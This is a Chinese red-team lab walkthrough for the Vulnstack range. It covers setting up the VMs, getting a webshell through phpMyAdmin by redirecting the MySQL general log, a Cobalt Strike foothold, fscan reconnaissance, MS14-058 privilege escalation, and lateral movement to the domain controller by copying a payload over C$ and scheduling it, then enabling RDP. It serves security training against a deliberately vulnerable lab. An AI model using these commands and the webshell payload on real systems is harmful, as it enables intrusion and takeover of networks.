前言

红队实战系列，主要以真实企业环境为实例搭建一系列靶场，通过练习、视频教程、博客三位一体学习。另外本次实战完全模拟ATT&CK攻击链路进行搭建，开成完整闭环。后续也会搭建真实APT实战环境，从实战中成长。

环境搭建

下载地址：

http://vulnstack.qiyuanxuetang.net/vuln/detail/2/

下载后解压为 3 个虚拟机，网络拓扑如下：

1.在vmware打开三个虚拟机

2、根据下图所示，需要模拟内网和外网两个网段， Win7 虚拟机相当于网关服务器，所以需要两张网卡，故需要配置两个网络适配器（网卡），点击添加网络设配器：

3.根据内网的三个主机配置到VMnet3的网卡中,将VMnet3的ip段设为192.168.52/24，将外网网卡设置为net

虚拟机所有统一密码：hongrisec@2019

4、至此网络配置完成，现在可以登进去每个服务器看一看，是不是成功获取了IP，这三台虚拟主机默认开机密码都是hongrisec@2019（有的会提示密码已过期，更改为 hong@2019 即可），最终形成的 IP 划分情况如下：

5.在win7外网服务器中打开web服务

在C:\phpStudy\下打开phpstudy

ps：如果开启失败重启win7的虚拟机

6.关闭三个主机的防火墙

Web渗透

1.信息收集

(1).用nmap扫IP

nmap 192.168.52.0/24 

(2).用dirsearch扫目录

python3 dirsearch.py -u 192.168.197.132

(3).访问首页

2.获取webshell

(1)尝试弱口令 root:root

(2).访问/phpMyadmin

(3).登录

(4).先尝试直接使用into outfile导出木马的方式是否可行，先执行select @@basedir;查网站的物理路径：

(5)那么执行select '<?php eval($_POST[cmd]);?>' into outfile 'C:/phpStudy/www/111.php';写入木马到网站的根目录，写入失败

(6)通过 MySQL 日志导入木马。先执行命令：show variables like '%general%';查看日志状态：未开启

(7）开启日志

SET GLOBAL general_log='on';
show variables like '%general%';

(8)当执行sql语句后会存储在日志中，我们可以修改日志路径，写入到网站根目录的 111.php 文件

SET GLOBAL general_log_file='C:/phpStudy/www/shell.php'

(9)接下来执行 SQL 语句：

SELECT "<?php @eval($_POST['cmd']);?>"

即可将一句话木马写入 shell.php 文件中：

(10)访问http://192.168.197.132/shell.php,用哥斯拉连接

看网站根目录还有一个文件夹

可以访问一下

内网渗透

1.CS上线

用kali打开cs服务器

./teamserver 192.168.197.128 123456

打开客户端开启监听生成木马，通过哥斯拉传入

执行木马程序

上线成功

2.信息探测

通过FScan内⽹综合扫描⼯具扫描

使⽤sock代理执⾏

使用proxifier

代理成功

在物理机执行fsan.exe

fscan.exe -h 192.168.52.0/24

或者

三个主机IP已知

抓取明文密码

3.提权

通过MS14-058漏洞提权

提权成功

4.横向移动

连接不上

换种方法

正向监听4444

生成木马上传

#将正向⽊⻢放⼊webadmin的桌⾯，然后拷⻉执⾏⽂件到⽬标机器
beacon> shell copy zx.exe \\192.168.52.138\c$
#添加计划任务，修改下⾯时间
beacon> shell at \\192.168.52.138 21:06 c:\zx.exe
#等待时间到了以后，连接正向⽊⻢，控制域控
connect 192.168.52.138

等到时间就会连接

5.远程连接

beacon>shell REG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server /v fDenyTSConnections /t REG_DWORD /d 00000000 /f

在win7远程连接DC 账号：密码 administrator:hong@2019